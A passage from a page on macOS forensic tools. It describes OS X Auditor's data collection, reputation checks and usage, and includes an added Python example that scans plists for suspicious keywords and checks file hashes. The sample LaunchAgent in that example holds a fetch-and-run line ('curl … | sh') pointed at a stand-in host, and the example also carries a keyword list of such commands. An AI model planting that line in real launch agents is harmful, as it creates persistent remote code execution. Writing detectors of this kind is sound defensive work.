the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage

the users’ social and email accounts

the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist themselves.
It can verify the reputation of each file on:

Team Cymru’s MHR

VirusTotal

your own local database

It can aggregate all logs from the following directories into a zipball:

/var/log (-> /private/var/log)

/Library/logs

the user’s ~/Library/logs

Finally, the results can be:

rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)

rendered as an HTML log file

sent to a Syslog server
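The two checks listed above (suspicious keywords inside a .plist, and file reputation against a local hash database) as an added example, not code from OS X Auditor itself. It uses the stdlib plistlib, which since Python 3.4 reads XML and binary plists natively; the sample LaunchAgent, the keyword list and the local database are constructed for the demo.

```python
import hashlib
import plistlib

# Constructed sample: an XML LaunchAgent plist of the kind the tool walks through.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.updater</string>
    <key>ProgramArguments</key>
    <array><string>/bin/sh</string><string>-c</string>
           <string>curl http://example.invalid/x | sh</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>"""

# Hypothetical keyword list; the tool's real list is not given on the page.
SUSPICIOUS_KEYWORDS = ("curl", "| sh", "base64", "/tmp/")

# Constructed stand-in for a local reputation database (cf. "-l localhashes.db"),
# keyed by SHA-256 of file contents.
KNOWN_BAD_CONTENT = b"#!/bin/sh\n# constructed sample of a flagged file\n"
LOCAL_HASH_DB = {hashlib.sha256(KNOWN_BAD_CONTENT).hexdigest(): "known-bad"}

def load_plist(data: bytes) -> dict:
    """plistlib autodetects XML vs. binary plist format (Python 3.4+)."""
    return plistlib.loads(data)

def to_binary(plist: dict) -> bytes:
    """Serialise as a binary plist, the form most macOS .plist files use on disk."""
    return plistlib.dumps(plist, fmt=plistlib.FMT_BINARY)

def plist_findings(plist: dict, keywords=SUSPICIOUS_KEYWORDS) -> list:
    """Return the keywords found in any string value, searching nested dicts/arrays."""
    hits = set()
    def walk(value):
        if isinstance(value, dict):
            for item in value.values():
                walk(item)
        elif isinstance(value, list):
            for item in value:
                walk(item)
        elif isinstance(value, str):
            hits.update(k for k in keywords if k in value)
    walk(plist)
    return sorted(hits)

def launchd_program(plist: dict):
    """Path launchd would execute: 'Program', else first 'ProgramArguments' entry."""
    if "Program" in plist:
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None

def reputation(file_bytes: bytes, db=LOCAL_HASH_DB) -> str:
    """Look the file's SHA-256 up in the local database; 'unknown' if not listed."""
    return db.get(hashlib.sha256(file_bytes).hexdigest(), "unknown")
```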

Author
Jean-Philippe Teissier – @Jipe_ & al.

Support
OS X Auditor started as a weekend project and is now barely maintained. It has been forked by the folks at Yelp, who created osxcollector.
If you are looking for a production / corporate solution, I recommend moving to osxcollector (https://github.com/Yelp/osxcollector).

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you get full plist parsing support from the OS X Foundation framework through pyobjc:

pip install pyobjc

If you can’t install pyobjc, or if you plan to run OS X Auditor on an OS other than Mac OS X, you may run into problems with plist parsing; install these fallbacks:

pip install biplist
pip install plist

These dependencies will be removed once a working native plist module is available in Python.

How to run

OS X Auditor runs well with Python >= 2.7.2 (2.7.9 is OK). It does not yet run with any other version of Python (due to the plist nightmare).

OS X Auditor is maintained to work on the latest OS X version. It will do its best on older OS X versions.

You must run it as root (or via sudo) if you want to use it on a running system; otherwise it won’t be able to access some system files and other users’ files.

If you’re using API keys from environment variables (see below), you need sudo -E so that the user’s environment variables are preserved.

Type osxauditor.py -h to get all the available options, then run it with the selected options,
e.g. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Disk Arbitrator
Disk Arbitrator is a Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which enables a program to participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator will block the mounting of file systems to avoid mounting them read-write and violating the integrity of the evidence. https://github.com/aburgh/Disk-Arbitrator

Mandiant Memoryze(tm) for the Mac
Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems. http://www.mandiant.com/resources/download/mac-memoryze